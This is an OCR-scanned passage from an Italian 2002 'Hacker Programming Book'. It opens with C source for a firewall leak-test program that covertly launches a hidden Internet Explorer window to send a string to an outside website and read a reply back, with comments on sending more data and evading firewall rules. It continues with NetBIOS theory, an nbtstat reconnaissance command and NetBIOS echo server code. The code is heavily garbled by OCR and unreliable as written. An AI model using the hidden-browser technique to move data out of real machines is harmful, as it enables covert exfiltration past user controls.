const char* baseURL = "http : //gre . com/lt/leaktest . htm?" ; 
const char* outputString = "PersonalInfoGoesHere"; 
char inputString[512] ; 

// Main program 

void WinMainCRTStartup ( ) 

{ 

if ( DisplayWelcomeBanner () ) 
{ 

if ( TransmitAndReceiveData () ) 
{ 

DisplaySucessBanner () ; 

; 

else 
{ 

DisplayFailureBanner () ; 

} 

} 

ExitProcess (0) ; 

} 

// Display a welcome message ; allow the user to quit 

bool DisplayWelcomeBanner ( ) 

{ 

return MessageBox (NULL, 

"This program demonstrates how your firewall does NOT protect against\n" 
"outbound connections, by sending a short string to Steve Gibson ' s web site\n" 
"then retrieving a reply. For this simple example, you should currently be\n" 
"connected to the Internet . \n \n " 

"(Note that this program happens to rely on Steve 's web pages as they were\n" 
"on November 4, 2001.)\n\n" 

"Please note that this program was NOT written or authorized by Steve Gibson;\n" 
"his web site is merely used as an example. \n\n" 

"This will probably just take a couple seconds; it will not take more than 
30. \n\n" 

"Do you wish to continue?" , 
title, 

MB YESNO I MB__ICONQUESTION) == IDYES; 

ì 



// Perform the actual test 
bool TransmitAndReceiveData ( ) 
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// Step 1: Find the Internet Explorer executable (its location is in the 
// registry) . 

// 

char buffer [MAX__PATH + 512]; 
long len = sizeof (buffer) ; 

RegQueryValueA ( 

HKEY_LOCAL_MACHINE, 

"SOFTWARE\ \Classes\\Applications\ \iexplore . exe\\shell\\open\\command" , 

buffer, 

Slen) ; 

// 

// Step 2: Give it our "secret" URL and spawn IE in a hidden window. 
// Of course, the window doesn't have to be hidden, but why not. 

// 

// Note to those who think this method is limited: 

// 

// If we wanted to pass more Information than fits on the command line, 
// we could first create an HTML file on the user's hard drive that 
// consists of that data, and have that HTML file reload to the actual 
// URL that we wanted to send the data to, passing the data along (this 
// can be done with a META REFRESH tag in the file 's header, for example, 
// or with JavaScript if you want to get fancy) . In this instance, 
// we are keeping things simple. 
// 

for ( char*c = Sbuffer [1] ; *c 1= 0; c++ ) 
if ( *c =='%') *c = 0; 

z_strcat (buffer, baseURL) ; 
z_strcat (buffer, outputString) ; 
WinExec (buffer, SW_HIDE) ; 

// 

// Step 3: Now wait for the page to load, and retrieve some Information 
// (which, in this trivial example, is passed back through the web page ' s 
// title) . If this takes more than 30 seconds, give up. 

// 

// Note to those who think this method is limited: 

// 

// Since we have the handle to the Internet Explorer page ' s window, we 
// can easily find its child Windows, and can retrieve their contents 
// as well. So we could also retrieve data from the actual page's 
// contents rather than just the title. As a trivial example, send a 
// "select ali" followed by clipboard "copy" command to that window, 
// and you 've got ali the data. (Of course, if you really wanted to be 
// slick you wouldn't do it with such primitive means.) 
// 

int startCount = GetTickCount () ; 

do 
( 

EnumWindows (EnumWindowsProc , 0) ; 

if ( (GetTickCount () - startCount) > 30000 ) 
return false; 
) while ( ieWnd == NULL ); 

// 

// Step 4: Now we dose the window, out of politeness. As an aside, 
// not how we are sending it a command here. . . We can do ali kinds 
// of interesting things to it if we wanted, such as make it navigate 
// to a different URL. Such methods can even be used on pre-existing 
// Internet Explorer Windows; we don't need to have created them 
// ourselves. In that way, we could pass Information even if some 
// goofy firewall vendor decides to block programs with top-level 
// hidden Windows from establishing Internet connections, or some 
// such silly thing. 
// 

SendMessage (ieWnd, WM_SYSCOMMAND , SC_CLOSE, 0) ; 
return true; 



// Display the success banner 
void DisplaySucessBanner ( ) 
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char temp[1024] ; 
wsprintf (temp, 

"Success ! \n \n " 

"Which, in your case, means f allure: Your \"firewall\" is useless ! \n\n" 
"This program has:\n\n" 

" (1) Success fully breached your firewall. \n" 

"(2) Success fully sent the string '%s' to gre. corti. \n" 

"(3) Success fully retrieved the string ' %s ' from gre . corti. \n\n" 

"Your firewall 's so-called \"outbound protection\" is, unfortunately, nothing\n" 

"but a cruel joke.\n\n" 

"Bob Sundling\n" 

"tooleaky@zensoft . com\n " 

"http: //tooleaky. zensoft . corti/", 

outputString, 

inputString) ; 

MessageBox (NULL, temp, title, MB__OK / MB^ICONINFORMATION) ; 



// Display the failure banner (not very likely) 

void DisplayFailureBanner ( ) 

{ 

MessageBox (NULL, 

"There was apparently no leak, your computer or Internet connection is very 
slow, \n " 

"or, most likely, the GRC.COM website is down temporarily. Please try again 
later. ", 

title, 

MB OK I MB^ICONINFORMATION) ; 



// Find the appropriate window 

BOOL CALLBACK EnumWindowsProc ( HWND hWnd, LPARAM lParam ) 
{ 

char tmp [512] ; 

GetWindowText (hWnd, tmp, sizeof (tmp) ) ; 

// 

// Bere we check for the first eight characters of the title being "LeakTest" 
// In actual use, this would be something more obscure, like "2x9$$@fA" for 
// example. (If the user happens to have another window that starts with 
// "LeakTest" we may find it instead. For this simple example, we do not 
// care. We could instead search by the window 's class, or get the window 
// handle of the URL field to verify, or whatever, if we really wanted to — or 
// just keep track of the process when we first create it!) 
// 

if C z_memcmp (tmp , "LeakTest" , 8) == 0 ) 
( 

z_strcpy (inputString, &tmp[12]); // Save the title 

inputString [23] = 0; // We just want a few characters in our example 

ieWnd = hWnd; // Save the window so we can politely dose it 

return FALSE; 

} 

return TRUE; 

) 



// Some library functions . These aren't exactly identical to the standard C++ 
// library functions , in case you are wondering . 
bool z memcmp ( void* _bl, void* _b2, size__t len ) 
{ 

char *bl = (char*)_bl; 
char *b2 = (char*)_b2; 

for ( size_t i = 0 ; i < len; i++ ) 
if ( bl[i] != b2[i] ) 
return true; 

return false; 

} 



char* z__strcat ( char* dest, const char *src ) 
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return dest; 

} 

char* z_strcpy ( char* dest, const char *src ) 
{ 

char *d = dest; 

while ( *src ) 

*dest++ = *src++; 

*dest = 0; 
return d; 

} 

size t zstrlen ( const char *s ) 
{ 

for ( int 1 = 0; s[i]; i++ ); 
return i; 



I I protocollo N etbios 

NetBios sta per Network Basic Input Output Systemed è uno strato di sessione che fornisce 
servizi di comunicazione utilizzati da applicazioni server e client in un ambito di rete IBM 
Token Ring oppure PC Lan network. 

Come abbiamo appena detto, le API NetBios sono comuni a tutti i protocolli che siamo 
abituati ad usare nell'ambito di internet e di intranet. 

In altre parole sviluppando delle applicazioni in accordo con le specifiche NetBios, potremmo 
fa funzionare queste sia in ambito TCP/IP, NetBEUI oppure IPX/SPX. 
Chiaramente per poter funzionare tra due diverse workstations queste devono avere almeno 
un protocollo in comune. 

Una caratteristica importante da tenere a mente è quella che fa si che NetBios di fatto non sia 
un protocollo instradabile per cui utilizzerà un altro protocollo per eseguire questo 
instradamento.. 

Se tra due macchine, un client ed un server, esiste un router le applicazioni esistenti su di 
queste non saranno in grado di comunicare. 

II router distruggerebbe tutti i pacchetti non appena questi arrivano. 

TCP/IP e IPX/SPX sono invece ambedue instradabili e non possiedono questa limitazione. 
Tenete ben presente che se volete gestire una rete con questo protocollo dovrete 
implementare almeno un protocollo instradabile da utilizzare per il livello di trasporto della 
rete. 

È importante capire come dei protocolli di trasporto possono relazionarsi con NetBios 
mediante delle caratteristiche di programmazione. 

La risposta è il numero dell'adattatore LAN (LANA) che a sua volta è anche la chiave per 
comprendere NetBios. 

Il numero LANA corrisponde ad una copia di adattatori con un protocollo di trasporto. 
Nelle implementazioni originali di NetBios ogni adattatore fisico possedeva un numero unico. 
Con Windows la questione si è complicata un po' in quanto ogni stazione di fatto può 
possedere più protocolli e più adattatori. 

Un numero LANA corrisponde ad un paio unici di adattatori di rete con un protocollo di 
trasporto. 

Ad esempio se una Workstation ha due schede di rete e due trasporti compatibili NetBios, 

questa possiederà quattro numeri LANA. 

I numeri che corrispondono a questo paio sono : 



TCP/ IP -Network card 1 
NetBEUI - Network card 1 
TCP/IP - Network card 2 



Normalmente il numero LANA è costituito da un numero da 0 a 9 che viene assegnato dal 
sistema operativo senza una particolare ordine, escludendo il numero 0 il quale ha come 
significato quello di LANA di DEFAULT. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Dicevamo prima che NetBios fornisce applicazioni con un interfaccia programmabile per 
condividere servizi ed informazioni su una grande varietà di strati bassi relativi a protocolli di 
rete, incluso il protocollo IP. 

In un implementazione NetBios i computers sono conosciuti mediante un nome che li 
distingue. 

Ogni computer ha un nome permanente che è settato dentro alla scheda. 

Ogni sistema può anche essere riconosciuto tramite un nome che viene settato a livello di 

programmazione ovvero stabiliti dal programmatore. 

I comandi implementati dentro a Netbios possono aggiungere o rimuovere nomi. 

Tutti i computers connessi in una sessione NetBios possono comunicare mediante l'utilizzo di 

datagrammi o mediante messaggi di broadcast. 

I datagrammi e i messaggi di broadcast permettono ad un computer di comunicare allo stesso 
tempo con molti altri allo stesso tempo ma con limitazione riguardante la dimensione dei 
messaggi. 

I datagrammi e i messaggi di broadcast non gestiscono procedimenti per la detenzione di 
errori e il loro recupero. 

I comandi di controllo nelle sessioni NetBios ed i comandi legati al trasferimento di dati 
permettono la comunicazione attraverso delle sessioni. 

I comandi relativi ai datagrammi NetBios permettono invece la comunicazione senza l'uso di 
sessioni. 

Le sessioni sono degli stream di comunicazioni a due vie. 

Tutti i comandi sono presentati alo NetBios in un formato chiamato NCB ovvero Network 
Control Blocks i quali sono alocati in memoria dal programma utente. 
Questo programma è anche responsabile del settaggio dei campi d'input necessari del NCB e 
dell'inizializzazione dei campi non utilizzati azero. 

Diversi campi dentro a NCB sono riservati per l'output da NetBios dopo il completamento di 
un comando. 

I I sistema di hacking che usa NetBios 

Mediante NETBIOS è possibile utilizzare una delle più comuni metodologie di hacking 
esistenti. 

Per poterla mettere in pratica è sufficiente utilizzare soltanto due Utilities fornite con il sistema 
operativo le quali servono normalmente a conoscere lo stato di alcune periferiche condivise 
su certi sistemi. 
Usando il comando 

C:\> nbtstat-Axxx.xxx.xxx.xxx 

Si ottengono le informazioni legate alla macchina remota specificata dall'IP voluto sulla linea 
di comando. 

II risultato potrebbe essere simile al seguente : 

NetBIOS Remote Machine 

Name Type Status 

DATARAT <00> UNIQUE Registered 
DATARAT <03> UNIQUE Registered 




I nomi N et Bios 

Abbiamo detto che ogni computer in una rete NetBios viene identificato tramite un nome 
permanente al quale si possono aggiungere altri nomi durante I processi di comunicazione. 

I nomi possono essere lunghi 16 caratteri e non devono contenere asterischi ( * ). 

II nome permanente è anche conosciuto con il termine di numero di nodo il quale 
generalmente è all'interno di una memoria ROM dentro alla scheda oppure è settato 
mediante degli DIP switch sempre su questa. 
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Questo numero è costituito da 10 caratteri di zero binari seguiti da 6 caratteri I quali devono 
essere unici sulla rete. 

Fino a 16 nomi locali possono essere aggiunti al NetBios su ogni computer dela rete 

mediante l'uso di un comando ADD NAME e da quello ADD GROUP NAME. 

Questi nomi sono salvati in una tabella locale la quale viene azzerata quando il sistema viene 

spento oppure quando il viene invocato un comando NetBios RESET. 

Un nome locale può a sua volta essere rimosso tramite l'utilizzo del comando BIOS DELETE 

NAME. 

Il nome locale può essere un nome unico oppure un nome di gruppo il quale è garantito dal 
punto di vista dell'unicità sulla rete da NetBios. 

Un nome di gruppo aggiunto ad un computer può essere agiunto, sempre come gruppo, 
anche ad un altro computer. 

I comandi legati al trasferimento di dati devono specificare entrambi i nomi di sorgente e di 
destinazione. 

Di questi 1 6 caratteri uno nascosto viene utilizzato per identificare il tipo di servizio o la 
funzione. 

La seguente tabella mostra i suffissi che rappresentano i servizi a cui sono associati. 

Common Suffixes for NetBIOS Names 

Suffix (Hex) First 15 Characters Networking Service 



00 


Computer name 


Workstation service 


00 


Domain name 


Domain name 


03 


Computer name 


Messenger service 


03 


User name 


Messenger service 


06 


Computer name 


RAS Server service 


20 


Computer name 


File Server service 


21 


Computer name 


RAS Client service 


1B 


Domain name 


Domain master browser 


1C 


Domain name 


Domain controllers 


1D 


Domain name 


Master browser 


1E 


Domain name 


Browser service election 



Mediante il comando NBSTAT è possibile esaminare le specifiche NetBios di una determinata 
macchina. 

I servizi orientati alle sessioni provvedono a garantire la spedizione di qualsiasi flusso di dati 
tra due punti. 

In questo ambito un server normalmente registra se stesso mediante alcuni nomi conosciuti. 
I clients cercano questi nomi in ordine per comunicare con questi server. 
In termini di NetBios i processi del server aggiungono il proprio nome all'interno di una 
tabella per ciascun numero LANA che vuole comunicare. 

I clients su altre macchine risolvono il nome del servizio con il nome della macchina e dopo 
richedono di connettersi con i processi del server. 

Come è possibile vedere sono necessari un certo numero di passi per stabilire questo tipo di 
circuito. 

Le comunicazioni basate sulle sessioni garantiscono una leggibilità ed un ordine dei pacchetti 
anche se di fatto il tutto è basato su d un sistema orientato ai messaggi. 
Quando un client spedisce un comando di richiesta di lettura il server restituisce soltanto un 
pacchetto di dati sullo strema, anche se di fatto il client fornisce un buffer sufficientemente 
grande per più pacchetti. 

That is, if a connected client issues a read command, the server will return only one packet of 
data on the stream, even if the client supplies a buffer large enough for several packets. 
Nella seguente tabella vengono descritti dei qualificatori elativi a nomi di gruppi : 



Group name qualifiers 
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16th Byte Identifies 

<1 C> A domain group name that contains a list of the specific addresses of 

computers that have registered the domain name. The domain 
controller registers this name. WINS treats this as a domain group: 
each member of the group must renew its name individually or be 
released. The domain group is limited to 25 names. When a static 1C 
name is replicated that clashes with a dynamic 1C name on another 
WINS server, a union of the members is added, and the record is 
marked as static. If the record is static, members of the group do not 
have to renew their IP addresses. 

<1 D> The master browser name used by clients to access the master 

browser. There is one master browser on a subnet. WINS servers 
return a positive response to domain name registrations but do not 
store the domain name in their databases. If a computer sends a 
domain name query to the WINS server, the WINS server returns a 
negative response. If the computer that sent the domain name query 
is configured as h-node or m-node, it will then broadcast the name 
query to resolve the name. The node type refers to how the client 
attempts to resolve a name. Clients configured for bnode resolution 
send broadcast packets to advertise and resolve NetBIOS names. The 
p-node resolution uses point-to-point communication to a WINS 
server. The m-node resolution is a mix of b-node and p-node in which 
b-node is used first and then, if necessary, p-node is used. The last 
resolution method is h-node, or hybrid node. It always attempts to use 
p-node registration and resolution first, falling back on b-node only 
upon failure. Windows installations default to h-node. 

<1 E> A normal group name. Browsers can broadcast to this name and listen 

on it to elect a master browser. These broadcasts are for the locai 
subnet and should not cross routers. 

<20> An Internet group name. This type of name is registered with WINS 

servers to identify groups of computers for administrative purposes. 
For example, "printersg" could be a registered group name used to 
identify an administrative group of print servers. 

_MSBROWSE_ Instead of a single appended 1 6th character, "_MSBROWSE_" is 
appended to a domain name and broadcast on the locai subnet to 
announce the domain to other master browsers. 

Metodi di programmazione 

Abbiamo parlato prima del NetBios Control Block. 

A questo punto traduciamo questo in una struttura del Linguaggio C. 

typedef struct _NCB 
{ 



UCHAR 


ncb command ; 


UCHAR 


ncb_retcode; 


UCHAR 


ncb_lsn; 


UCHAR 


ncb_num; 


PUCHAR 


ncb_buffer; 


WORD 


ncb_length; 


UCHAR 


ncb_callname [NCBNAMSZ ] ; 


UCHAR 


ncb_name [NCBNAMSZ] ; 


UCHAR 


ncb_rto; 


UCHAR 


ncb_sto; 


void 


(*ncb_post) (struct _NCB 
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UCHAR 


ncb_lana_num; 


UCHAR 


n cb_ cmd_ cplt; 


UCHAR 


ncb_reservs [10] ; 


HANDLE 


ncb_event ; 


} * PNCB, NCB; 





La tabella con la descrizione di tali campi è la seguente : 



NCB structure members 



Field 



Definition 



ncb_command Specifica il comando NetBIOS che deve essere eseguito. Molti 

comandi possono essere eseguiti sia in modo sincrono che asincrono 
mediante il bitwise ORing (flag ASYNCH (0x80) ed il comando). 

ncb_retcode Specifica il codice di ritorno dell'operazione.. Una funzione setta questo 
valore a NRC_PENDING fino a quando un operazione asincrona è in 
esecuzione. 

ncbjsn Identifica il numero locale di sessione il quale serve ad identificare in 

modo univoco nell'ambito della corrente sessione. La funzione ritorna 
un nuovo numero di sessione dopo un comando NCBCALL o 
NCBLISTEN. 

ncb_num Specifica il numero del nome locale della rete. Un nuovo numero è 

restituito per ogni chiamata ad un comando NCBADDNAME o 
NCBADDGRNAME. Dovete usare un numero valido con tutti i comandi 
datagramma. 

ncb_buffer Punta ad un data buffer. Per i cmandi che inviano dati, questo buffer 
contiene appunto i dati da spedire. Nel caso di comandi che ricevono 
dati questri sono contenuti dentro allo stesso buffer. Per altri cmandi 
come ad esempio NCBENUM, il buffer deve essere la strutura 
predefinit LANA ENUM. 

ncbjength Specifica la lunghezza del buffer in byìtes. Per i comandi di ricezione , 
Netbios setta qesto valore con il numero di bytes ricevuti. Se uno 
specifico buffer non è sufficientemente grande, NetBios setta il valore di 
errore NRC_BUFLEN. 

ncb_callname Specifica il nome dell'applicazione remota.. 

ncb_name Specifica il nome mediante il quale l'applicazione vuole essere 
riconosciuta. 

ncb_rto Specifica il periodo di timeout per le operazioni di ricezione. Questo 

valore è specificato come multipli di 500 millisecondi. Il valore 0 
specifica nessun timeout. Questo valore è setato dai comandi 
NCBCALL e NCBLISTEN e influisce sui successivi comandi 
NCBRECV. 



ncb_sto Specifica il timeout per le operazioni d spedizione. Anche i qesto caso i 

valori sono multipli di 500 millisecondi. 0 indica nesun timeout. Questo 
valore settato dai comandi NCBCALL e NCBLISTEN influisce sui 
successivi comandi NCBSEND e NCBCHAINSEND. 

ncbjpost Specifica l'indirizzo della routine che deve essere chiamata dopo il 

completamento di un comendo sincrono. La funzione è definita come : 
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void CALLBACK PostRoutine(PNCB pncb); 

dove pncb punta ad un network control block del comando completato. 

ncb_lana_num Specifica il numero LANA sulla quale eseguire il comando. 

ncb_cmd_cplt Specifica il codice di ritorno. Netbios setta questo valore a 
NRC_PENDING fino a quando un operazione asincrona è in 
esecuzione. 

ncb reserve Reservata. Deve essere 0 



ncb_event Specifica un handle ad un oggetto di Windows destinato alla gestione 
degli eventi settato ad uno stato nonsignaled. Quando un comando 
asincrono è completato, l'vento setta questo valore ad uno stato 
signaled. Soltanto un evento di reset deve essere usato. Questo campo 
deve essere 0 se ncb_command non possiede il flag ASYNCH 
settatot oppure se ncb_postè un valore diverso da zero; in altri casi 
Netbios ritorna un codice d'errore NRC ILLCMD. 



Vediamo ora in Linguaggio C delle routine comuni NetBios. 

^include <windows.h> 
^include <stdio.h> 
^include <stdlib.h> 

#incl ude "nbcommon . h " 

// 

// Enumera tutti I numeri LANA 

// 

int LanaEnum (LANA_ENUM *lenum) 
{ 

NCB ncb; 

ZeroMemory ( Sncb, sizeof (NCB) ) ; 
ncb . ncb_command = NCBENUM; 
ncb.ncb_buffer = (PUCHAR) lenum; 
ncb . ncb_length = sizeof (LANA_ENUM) ; 

if (Netbios l&ncb) != NRC_ GOODRET) 
i 

printf ( "ERROR : Netbios: NCBENUM: %d\n" , ncb. ncb_ret code ) ; 
return ncb . ncb_retcode ; 

} 

return NRC_ GOODRET; 

} 

// 

// Resetta ogni numero LANA listato dentro alla struttura 
// LANA_ENUM. Setta anche 1' ambiente NetBios 
// (max sessions, max name table size) , ed utilizza il primo 
// nome NetBIOS. 

// 

int ResetAll (LANA_ENUM *lenum, UCHAR ucMaxSession, 
UCHAR ucMaxName, BOOL bFirstName) 

{ 

NCB ncb; 
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ZeroMemory (Sncb, sizeof (NCB) ) ; 

ncb . ncb_command = NCBRESET; 

ncb.ncb_callname[0] = ucMaxSession; 

ncb . ncb_callname [2] = ucMaxName; 

ncb . ncb_callname [3] = (UCHAR)bFirstName; 

for(i = 0; i < lenum->length; i++) 
{ 

ncb . ncb_lana_num = lenum->lana [i] ; 
if (Netbios (Sncb) != NRC_ GOODRET) 
{ 

printf ( "ERROR : Netbios: NCBRESET [ %d] : %d\n", 

ncb . ncb_lana_num, ncb . ncb_ret code) ; 
return ncb . ncb_retcode; 

} 

) 

return NRC_GOODRET; 

} 

// 

// Aggiunge il nome al numero LANA. Restituisce il numero del nome 
// per il nome registrato. 

// 

int AddName (int lana, char *name, int *num) 
{ 

NCB ncb; 

ZeroMemory ( &ncb, sizeof (NCB) ) ; 

ncb . ncb_command = NCBADDNAME ; 

ncb . ncb_lana_num = lana; 

memset (ncb . ncb_name , ' ', NCBNAMSZ) ; 

strncpy (ncb . ncb_name, name, strlen (name) ) ; 

if (Netbios (&ncb) != NRC_ GOODRET) 
{ 

printf ("ERROR: Netbios: NCBADDNAME [lana=%d; name=%s] : %d\n" , 

lana, name, ncb. ncb_ret code ) ; 
return ncb . ncb_retcode ; 

) 

*num = ncb.ncb_num; 
return NRC_ GOODRET; 

} 

// 

// Aggiunge il nome gruppo NetBIOS al numero LANA. 
// Restituisce il numero nome per il nome aggiunto. 

// 

int AddGroupName ( int lana, char *name, int *num) 
{ 

NCB ncb; 

ZeroMemory ( Sncb, sizeof (NCB) ) ; 

ncb . ncb_command = NCB AD D GRNAME ; 

ncb . ncb_lana_num = lana; 

memset (ncb. ncb_name, ' ', NCBNAMSZ) ; 

strncpy (ncb . ncb_name, name, strlen (name) ) ; 

if (Netbios (&ncb) != NRC_ GOODRET) 
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prlntf("ERROR: Netbios : NCBADDGRNAME [lana=%d; name=%s] : %d\n" , 

lana, name, ncb. ncb_ret code ) ; 
return ncb . ncb_retcode ; 

ì 

*num = ncb. ncb_num; 
return NRC_ GOODRET; 

ì 

// 

// Cancella il nome NetBIOS dalla tabella nomi asociato con 
// il numero LANA 

// 

int DelName(int lana, char *name) 
{ 

NCB ncb; 

ZeroMemory (Sncb, sizeof (NCB) ) ; 

ncb . ncb_command = NCBDELNAME ; 

ncb . ncb_lana_num = lana; 

memset (ncb . ncb_name , ' ', NCBNAMSZ) ; 

strncpy (ncb . ncb_name, name, strlen (name) ) ; 

if (Netbios (&ncb) != NRC_ GOODRET) 
{ 

printf ("ERROR: Netbios: NCBADDNAME [lana=%d; name=%s] : %d\n", 

lana, name, ncb. ncb_ret code ) ; 
return ncb . ncb_retcode; 

) 

return NRC_ GOODRET; 

ì 

// 

// Invia len bytes dal buffer dati sulla sessione (lsn) 
// e numero lana 

// 

int Send(int lana, int lsn, char *data, DWORD len) 
{ 

NCB ncb; 
int retcode; 

ZeroMemory ( Sncb, sizeof (NCB) ) ; 
ncb . ncb_command = NCBSEND; 
ncb . ncb_buffer = (PUCHAR) data; 
ncb . ncb_length = len; 
ncb . ncb_lana_num = lana; 
ncb .ncb_lsn = lsn; 

retcode = Netbios (Sncb) ; 

return retcode; 

ì 

// 

// Riceve fino a len bytes dentro al data buffer sulla sessione 
// (lsn) e sul numero lana 

// 

int Recv(int lana, int lsn, char *buffer, DWORD *len) 
i 

NCB ncb; 
ZeroMemory ( Sncb, sizeof (NCB) ) ; 
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ncb . ncb_command = NCBRECV; 

ncb . ncb_buffer = (PUCHAR) buffer; 

ncb . ncb_length = *len; 
ncb . ncb_lana_num = lana; 
ncb.ncb_lsn = lsn; 

if (Netbios l&ncb) != NRC_ GOODRET) 
{ 

*len = -1; 

return ncb . ncb_retcode ; 

ì 

*len = ncb . ncb_length ; 
return NRC_ GOODRET; 

} 

// 

// Disconnette la sessione sul numero lana 

// 

int Hangup(int lana, int lsn) 
{ 

NCB ncb; 
int retcode; 

ZeroMemory (Sncb, sizeof (NCB) ) ; 
ncb . ncb_command = NCBHANGUP; 
ncb.ncb_lsn = lsn; 
ncb . ncb_lana_num = lana; 

retcode = Netbios (Sncb) ; 

return retcode; 

ì 

// 

// Cancella il comando asincrono specificato dentro a NCB 

// 

int Cancel (PNCB pncb) 
{ 

NCB ncb; 

ZeroMemory (Sncb, sizeof (NCB) ) ; 

ncb . ncb_command = NCBCANCEL; 

ncb . ncb_buffer = (PUCHAR) pncb; 

ncb . ncb_lana_num = pncb->ncb_lana_num; 

if (Netbios (Sncb) != NRC_ GOODRET) 
i 

printf ("ERROR: NetBIOS: NCBCANCEL: %d\n", ncb. ncb_ret code ) ; 
return ncb . ncb_retcode ; 

ì 

return NRC_ GOODRET; 

} 

// 

// Formatta il nome NetBIOS per renderlo stampabile . Ogni 

// carattere non stampabile viene sostituito con un punto. Il buffer 

// outname è la stringa restituita, la quale è almeno 

// NCBNAMSZ + 1 carattere, come lunhezza . 

// 

int FormatNetbiosName (char *nbname, char *outname) 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



{ 

int i; 

strncpy (outname, nbname, NCBNAMSZ) ; 
outname[NCBNAMSZ - 1] = ' \0 ' ; 
for(i = 0; 1 < NCBNAMSZ - 1; 1++) 
{ 

// If the character isn 't printable, replace it with a 

// 

if ( ! ( (outname [i] >= 32) SS (outname [i] <= 126))) 
outname [i] = ' . ' ; 

} 

return NRC_ GOODRET; 

} 



La struttura LANA_ENUM è definita come segue : 

typedef struct LANA_ENUM 
{ 

UCHAR length; 
UCHAR lana [MAX_LANA + 1] ; 
} LANA_ ENUM, *PLANA_ENUM; 

Ora che possediamo le funzioni di base possiamo vedere il server che lista le richieste di 
comunicazione inviate dai client. 

Come avevamo detto prima nella struttura la funzione deve essere del tipo callback. 

^include <windows.h> 
^include <stdio.h> 
^include <stdlib.h> 

^include " . . \Common\nbcommon.h" 

#define MAX_B UFFER 2048 

#define SERVER_NAME "TEST— SERVER— 1 " 

DWORD WINAPI ClientThread (PVOID IpParam) ; 

// 

// Function: ListenCallback 

// 

// Descrizione : 

// Questa funzione viene chiamata quando un evento di listen 
asincrono 

// è completato. 

// Se non ci sono errori viene creato un thread per gestire il 
client . 

// 

void CALLBACK ListenCallback (PNCB pncb) 
{ 

HANDLE hThread; 
DWORD dwThreadld; 

if (pncb->ncb_retcode != NRC_ GOODRET) 
{ 

printf ("ERROR: ListenCallback: %d\n", pncb->ncb_retcode) ; 
return; 

ì 

Listen (pncb->ncb_lana_num, SERVER_NAME) ; 
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hThread = CreateThread(NULL, 0, ClientThread, (PVOID)pncb, 0, 
SdwThreadld) ; 

if (hThread == NULL) 
{ 

pr±ntf("ERROR: CreateThread: %d\n" , GetLastError ( ) ) ; 
return; 

ì 

CloseHandle (hThread) ; 
return; 

ì 

// 

// Function : ClientThread 

// 

// Descrizione : 

// Il client thread blocks per i dati spedito dal client il quale 
// li spedisce indietro. 

// Questo è un loop continuo fno a quando la sessione viene chiusa 
// oppure fino a quando non avviene un errore. Se 

// la lettura o la scrittura fallisce con NRC_SCLOSED, la sessione 
// viene chiusa e quindi il loop termina. 

// 

DWORD WINAPI ClientThread (PVOID IpParam) 
{ 

PNCB pncb = (PNCB) IpP arata; 

NCB ncb; 

char szRecvBuff [MAX_BUFFER] ; 

DWORD dwBufferLen = MAX_B UFFER , 

dwRetVal = NRC_ GOODRET; 
char szClientName[NCBNAMSZ+l] ; 

FormatNetbiosName (pncb->ncb_callname , szClientName) ; 

while (1) 
{ 

dwBufferLen = MRX_B UFFER ; 

dwRetVal = Recv (pncb->ncb_lana_num, pncb->ncb_lsn, 

szRecvBuff, SdwBufferLen) ; 
if (dwRetVal != NRC_ GOODRET) 

break; 

szRecvBuff [dwBufferLen] = 0; 

printf("READ [LANA=%d] : '%s'\n", pncb->ncb_lana_num, 
szRecvBuff) ; 

dwRetVal = Send (pncb->ncb_lana_num, pncb->ncb_lsn, 

szRecvBuff, dwBufferLen) ; 
if (dwRetVal != NRC_ GOODRET) 

break; 

} 

printf ( "Client ' %s ' on LANA %d disconnected\n" , szClientName, 
pncb->ncb_lana_num) ; 

if (dwRetVal != NRC_SCLOSED) 
i 

// Some other error occurred; hang up the connection 

// 

ZeroMemory ( Sncb, sizeof (NCB) ) ; 
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); 



ncb . ncb_command = NCBHANGUP ; 
ncb . ncb_lsn = pncb->ncb_lsn; 
ncb . ncb_lana_num = pncb->ncb_lana_num; 

if (Netbios l&ncb) != NRC_ GOODRET) 
{ 

printf ( "ERROR : Netbios: NCBHANGUP: %d\n", ncb. ncb_ret code 

dwRetVal = ncb . ncb_retcode ; 

GlobalFree (pncb) ; 
return dwRetVal; 

} 

GlobalFree (pncb) ; 
return NRC_ GOODRET; 



} 



// 

// Function: Listen 

// 

// Descrizione : 

// Posta un listen asincrono con una funzione callback. Crea 

// una strutura NCB per 1' utilizzo con la callback (fino a quando 

// è necessario uno scope globale) . 

// 

int Listen (int lana, char *name) 
{ 

PNCB pncb = NULL; 

pncb = (PNCB) GlobalAlloc (GMEM_FIXED / GMEM_ ZERO INI T, sizeof (NCB) ) 

pncb->ncb_command = NCBLISTEN / ASYNCH; 
pncb->ncb_lana_num = lana; 
pncb->ncb _post = ListenCallback; 

// 

// This is the name clients will connect to 

// 

memset (pncb->ncb_name , ' ' , NCBNAMSZ) ; 
strncpy (pncb->ncb_name, name, strlen (name) ) ; 

// 

// An '*' means we'll take a client connection from anyone. By 
// specifying an actual name here, we restrict connections to 
// clients with that name only. 

// 

memset (pncb->ncb_callname, ' ', NCBNAMSZ) ; 
pncb->ncb_callname [0] = ' * ' ; 

if (Netbios (pncb) != NRC_ GOODRET) 
{ 

printf ("ERROR: Netbios: NCBLISTEN: %d\n", pncb->ncb_retcode) ; 
return pncb->ncb_retcode ; 

) 

return NRC_ GOODRET; 

} 

// 

// Function: main 

// 

// Descrizione: 
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// aggiunge il nome server ad ogni LANA, e invia un comando 
asincrono 

// NCBLISTEN su ogni LANA con la funzione callback appropriata. 
// Infine attende per una connessione in ingresso 
// e quindi esegue la condivisione di thread per gestirla. 
// Il thread principale semplicemente attende fino a quando II 
thread del 

// è utilizzato da una richiesta client . 

// Questa non è un applicazione reale ma solo una dimostrazione 

// 

int main(int argc, char **argv) 
{ 

LANAENUM lenum; 
int i, 

n uni; 

// Enumerate ali LANAs and reset each one 

// 

if (LanaEnum (& lenum) != NRC_ GOODRET) 
return 1; 

if (ResetAll (Slenum, 254, 254, FALSE) != NRC_ GOODRET) 
return 1; 

// 

// Add the server name to each LANA, and issue a listen on each 

// 

for(i = 0; i < lenum . length ; i++) 
{ 

AddName (lenum . lana [i ] , SERVER_NAME, &num) ; 
Listen (lenum. lana [i] , SERVER_NAME) ; 

ì 



while (1) 
{ 

Sleep (5000) ; 

ì 

La parte del client, ovvero la funzione di callback per questo lato della comunicazione è quella 
che segue. 

// Nbclient . c 

^include <windows.h> 
^include <stdio.h> 
^include <stdlib.h> 

^include " . . \Common\nbcommon . h" 

